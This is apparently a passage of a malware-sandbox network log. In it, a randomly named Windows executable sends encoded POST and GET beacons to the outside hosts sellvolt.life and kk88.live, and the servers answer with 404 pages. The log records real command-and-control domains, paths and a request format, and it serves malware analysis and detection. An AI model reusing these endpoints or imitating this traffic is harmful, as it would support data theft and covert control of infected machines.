                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              30192.168.2.650024209.74.64.190801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:35:23.903409004 CEST787OUTPOST /dbaa/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.sellvolt.life
                                                                                                                              Origin: http://www.sellvolt.life
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 234
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.sellvolt.life/dbaa/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 70 38 65 42 2b 4a 58 4c 2b 71 5a 6f 50 34 62 6f 6c 75 7a 31 61 50 32 54 4d 56 6a 43 79 70 53 57 6f 4a 48 49 51 72 2b 34 75 6f 54 78 57 62 51 4a 6d 6f 70 56 32 4c 74 77 4e 74 7a 73 50 54 42 49 39 6f 56 49 6d 4a 34 54 4a 4f 51 53 52 4b 4c 79 53 47 6d 51 4c 73 34 70 79 50 2b 2b 4d 65 44 69 69 74 5a 54 34 77 74 64 51 48 39 69 65 4e 57 7a 31 31 6a 46 6a 47 61 42 70 43 62 53 53 6e 37 2f 4c 30 66 6a 47 68 66 4b 4c 68 37 6d 59 2b 59 69 65 6f 32 73 2f 4b 73 43 48 63 55 78 6d 6b 76 66 79 50 6c 4b 41 6f 31 4d 48 55 56 42 56 6b 41 71 65 73 53 61 51 68 6f 6d 74 35 74 56 2b 4e 5a 78 4b 32 46 78 6a 50 52 6a 4b 55 76 4a 64 55 78 77 54 41 76 53 6b 67 63 47 6d 2b 69 6e 6d 57 59 79 68 51 3d 3d
                                                                                                                              Data Ascii: ej6Le=p8eB+JXL+qZoP4boluz1aP2TMVjCypSWoJHIQr+4uoTxWbQJmopV2LtwNtzsPTBI9oVImJ4TJOQSRKLySGmQLs4pyP++MeDiitZT4wtdQH9ieNWz11jFjGaBpCbSSn7/L0fjGhfKLh7mY+Yieo2s/KsCHcUxmkvfyPlKAo1MHUVBVkAqesSaQhomt5tV+NZxK2FxjPRjKUvJdUxwTAvSkgcGm+inmWYyhQ==
                                                                                                                              Oct 7, 2024 12:35:24.476787090 CEST533INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:35:24 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              31192.168.2.650025209.74.64.190801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:35:26.643429041 CEST1800OUTPOST /dbaa/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.sellvolt.life
                                                                                                                              Origin: http://www.sellvolt.life
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 1246
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.sellvolt.life/dbaa/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 70 38 65 42 2b 4a 58 4c 2b 71 5a 6f 50 34 62 6f 6c 75 7a 31 61 50 32 54 4d 56 6a 43 79 70 53 57 6f 4a 48 49 51 72 2b 34 75 6f 62 78 57 6f 59 4a 6e 50 31 56 33 4c 74 77 57 74 7a 76 50 54 41 49 39 75 39 45 6d 4d 67 44 4a 4d 6f 53 51 73 33 79 5a 58 6d 51 53 38 34 70 2b 76 2b 39 49 65 44 7a 69 74 70 58 34 77 39 64 51 48 39 69 65 49 61 7a 79 6b 6a 46 77 32 61 65 39 53 62 57 41 58 37 48 4c 30 6e 5a 47 68 4c 61 4c 77 48 6d 5a 61 45 69 53 36 4f 73 69 36 73 63 45 63 56 75 6d 6b 69 46 79 50 6f 6d 41 74 4a 6d 48 57 4a 42 55 78 68 4b 44 2b 6d 4b 4e 79 78 44 73 49 78 50 2b 61 77 42 4d 77 46 32 6d 75 6c 32 41 6d 66 6c 52 6b 68 71 54 78 57 32 68 43 51 70 68 61 7a 2f 73 43 42 38 36 4e 49 41 4e 2f 38 73 4e 4f 43 79 35 2b 34 4f 41 46 59 47 75 7a 59 54 53 47 5a 46 65 76 77 51 61 54 6e 61 6a 45 42 53 65 6a 4b 66 78 57 51 56 69 47 4a 77 6a 33 37 6b 34 4e 68 68 71 78 78 4b 72 58 4e 45 61 32 6f 5a 62 71 36 37 30 77 64 62 41 56 38 56 7a 4b 41 6f 76 47 2b 2f 58 2f 7a 4c 42 4e 78 66 6b 2b 6b 69 6b 4e 42 7a [TRUNCATED]
                                                                                                                              Data Ascii: ej6Le=p8eB+JXL+qZoP4boluz1aP2TMVjCypSWoJHIQr+4uobxWoYJnP1V3LtwWtzvPTAI9u9EmMgDJMoSQs3yZXmQS84p+v+9IeDzitpX4w9dQH9ieIazykjFw2ae9SbWAX7HL0nZGhLaLwHmZaEiS6Osi6scEcVumkiFyPomAtJmHWJBUxhKD+mKNyxDsIxP+awBMwF2mul2AmflRkhqTxW2hCQphaz/sCB86NIAN/8sNOCy5+4OAFYGuzYTSGZFevwQaTnajEBSejKfxWQViGJwj37k4NhhqxxKrXNEa2oZbq670wdbAV8VzKAovG+/X/zLBNxfk+kikNBzDCel7IVA9IjUZ32q0pmXZQt3J43nQf5iHh4mdQZleT2y34O7kZ3etKPZP2eofE3roCUNXovlD/Tp7VKimSDtNqq9eM8zSK5J9FQwP4yviqu019wfA6RkSPdBOBtWe/6k1m0I2MrsdNCilV05zsgyA4ugavHdaaHvVyqE6xj8mfaLDrX6va0XMUi5cIOw6EHG3qFp6YBRCX1QQgkWwsVwaiICtEvvdVtPurHTWEJTcDTbvlY3ElofA8gluIKqFDLOYlEgA3xulwOVXeW8gf0JPN4eErBCvQYfP6HrcJev2u3JnTy9GOE3I40Y5HbE30vLbeOSGS+Zzzdkq9Ektsv72HLw0J8WJqtTWELTm5Er1rHZLfrIfw8TdvcEF9iVZRFefWP34jCGxd/8mUXej2UNykDeRxxN6aFRvC9KIyfR25f2WB43sd33PdfAGdrXMqSWlQuAVgN3Q5TNhBjczIq47hMa8Hw1mR6YKUNzscyz3uj7P8Go/LzMZG9VMLhkF7mIIGotOCYF9WFJiPEl7yMGJf8KFA7D88JB2/SWagYGRzH7rbxXMHkU0B2/LJeBqdvSoHac3LXjs8LATBk/OpGw6Thv1QeKm1BwM3vItCBSop5GfafY6zlxhI9Fs50l03EqRUdGsJxr7I5QyvqmhDUncYoVARZIfck9Xh [TRUNCATED]
                                                                                                                              Oct 7, 2024 12:35:27.215451956 CEST533INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:35:27 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              32192.168.2.650026209.74.64.190801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:35:29.182535887 CEST505OUTGET /dbaa/?ej6Le=k+2h99XjzdZ+a8Guk9H+DZKAegT3yZPFsem4T4eX/urocpQMmPRl+MIiB7TuMhw38cELxfo4GPEke8/YGnuBTMId45zKJfXr14lU8gtHFAMAaoG54zLZ3lT6+2fSDV7gKgn9GEE=&An=mLdxo2Y8RLRh HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.sellvolt.life
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Oct 7, 2024 12:35:29.758048058 CEST548INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:35:29 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              33192.168.2.65002768.178.233.113801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:35:34.905025005 CEST751OUTPOST /m1w5/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.kk88.live
                                                                                                                              Origin: http://www.kk88.live
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 210
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.kk88.live/m1w5/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 36 70 6b 6e 63 4b 31 55 73 42 34 38 44 69 34 2b 55 42 75 6d 6e 39 51 4b 56 58 34 69 72 4b 34 49 6f 67 45 46 39 77 75 63 2b 6e 78 51 4a 6c 4d 65 6d 48 46 64 35 2b 73 30 78 2b 69 46 73 69 35 4d 6e 6a 47 61 57 78 41 71 6f 50 34 58 53 4f 75 67 54 70 63 4d 42 41 64 45 67 2f 53 66 34 4a 77 79 6a 4b 79 30 56 61 57 7a 65 6a 61 67 38 72 52 5a 50 4f 5a 53 6f 6d 32 4f 53 46 36 55 6c 58 43 37 73 64 70 41 6c 36 31 6f 71 35 59 37 72 6d 66 75 30 59 55 33 78 32 37 50 54 38 51 2b 41 39 42 6a 63 69 66 38 44 38 41 63 67 46 7a 2f 6e 31 4f 58 6c 7a 59 6c 72 6b 69 6f 4f 49 64 38 4b 55 78 47 73 51 44 75 2f 35 4f 78 42 6c 58 45
                                                                                                                              Data Ascii: ej6Le=6pkncK1UsB48Di4+UBumn9QKVX4irK4IogEF9wuc+nxQJlMemHFd5+s0x+iFsi5MnjGaWxAqoP4XSOugTpcMBAdEg/Sf4JwyjKy0VaWzejag8rRZPOZSom2OSF6UlXC7sdpAl61oq5Y7rmfu0YU3x27PT8Q+A9Bjcif8D8AcgFz/n1OXlzYlrkioOId8KUxGsQDu/5OxBlXE
                                                                                                                              Oct 7, 2024 12:35:35.797230005 CEST479INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:35:35 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 315
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              34192.168.2.65002868.178.233.113801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:35:37.460064888 CEST775OUTPOST /m1w5/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.kk88.live
                                                                                                                              Origin: http://www.kk88.live
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 234
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.kk88.live/m1w5/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 36 70 6b 6e 63 4b 31 55 73 42 34 38 4d 69 6f 2b 54 6d 36 6d 76 39 51 4a 51 58 34 69 68 71 34 4d 6f 67 49 46 39 78 71 4d 2f 52 68 51 4a 42 49 65 68 79 78 64 36 2b 73 30 6c 75 69 4b 69 43 35 44 6e 6a 44 6c 57 30 34 71 6f 4c 51 58 53 4f 65 67 54 65 6f 50 48 41 64 43 70 66 53 64 31 70 77 79 6a 4b 79 30 56 61 43 56 65 6a 43 67 38 61 68 5a 4f 73 78 54 68 47 32 42 46 31 36 55 76 33 43 2f 73 64 70 79 6c 2b 73 7a 71 37 77 37 72 69 58 75 33 4e 67 30 2b 32 37 42 65 63 52 5a 50 2f 63 53 47 54 65 7a 48 66 63 59 32 79 71 55 69 44 50 4e 35 41 59 47 35 30 43 71 4f 4b 46 4f 4b 30 78 73 75 51 37 75 74 75 43 57 4f 52 79 6e 49 63 72 56 32 67 70 75 43 37 32 6a 47 47 75 6a 4b 34 4a 42 42 41 3d 3d
                                                                                                                              Data Ascii: ej6Le=6pkncK1UsB48Mio+Tm6mv9QJQX4ihq4MogIF9xqM/RhQJBIehyxd6+s0luiKiC5DnjDlW04qoLQXSOegTeoPHAdCpfSd1pwyjKy0VaCVejCg8ahZOsxThG2BF16Uv3C/sdpyl+szq7w7riXu3Ng0+27BecRZP/cSGTezHfcY2yqUiDPN5AYG50CqOKFOK0xsuQ7utuCWORynIcrV2gpuC72jGGujK4JBBA==
                                                                                                                              Oct 7, 2024 12:35:38.347407103 CEST479INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:35:38 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 315
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              35192.168.2.65002968.178.233.113801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:35:40.018347979 CEST1788OUTPOST /m1w5/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.kk88.live
                                                                                                                              Origin: http://www.kk88.live
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 1246
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.kk88.live/m1w5/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 36 70 6b 6e 63 4b 31 55 73 42 34 38 4d 69 6f 2b 54 6d 36 6d 76 39 51 4a 51 58 34 69 68 71 34 4d 6f 67 49 46 39 78 71 4d 2f 52 70 51 4f 30 63 65 6d 68 70 64 37 2b 73 30 36 65 6a 4e 69 43 35 61 6e 6e 6e 70 57 31 45 55 6f 4e 55 58 54 73 57 67 52 72 45 50 55 67 64 43 32 50 53 59 34 4a 78 79 6a 4b 43 34 56 61 53 56 65 6a 43 67 38 59 70 5a 4a 2b 5a 54 6e 47 32 4f 53 46 36 49 6c 58 44 59 73 64 52 59 6c 2b 68 47 71 4c 51 37 72 43 48 75 34 62 4d 30 68 47 37 44 64 63 52 42 50 2f 51 4a 47 54 43 5a 48 63 41 2b 32 31 61 55 69 30 4b 53 39 41 5a 59 36 79 48 53 4e 61 56 6a 49 55 68 6b 68 67 43 55 6d 38 48 2b 41 41 2b 4a 4d 72 75 49 2f 79 30 43 46 49 4f 55 43 7a 50 4f 45 62 73 30 62 7a 72 6b 77 65 30 53 59 6c 44 67 54 36 36 33 73 32 73 73 79 58 4a 47 78 7a 59 4b 6a 67 33 75 75 4f 53 4d 4a 6c 4f 6a 61 35 33 6f 30 4a 36 31 56 53 7a 31 43 2f 75 53 72 32 76 34 65 2b 2b 67 79 33 4e 74 71 39 2b 36 76 4b 50 4d 63 47 58 79 48 6e 61 73 4d 54 62 31 71 48 71 46 4b 46 48 61 61 41 6f 41 75 42 53 42 50 63 4c 74 [TRUNCATED]
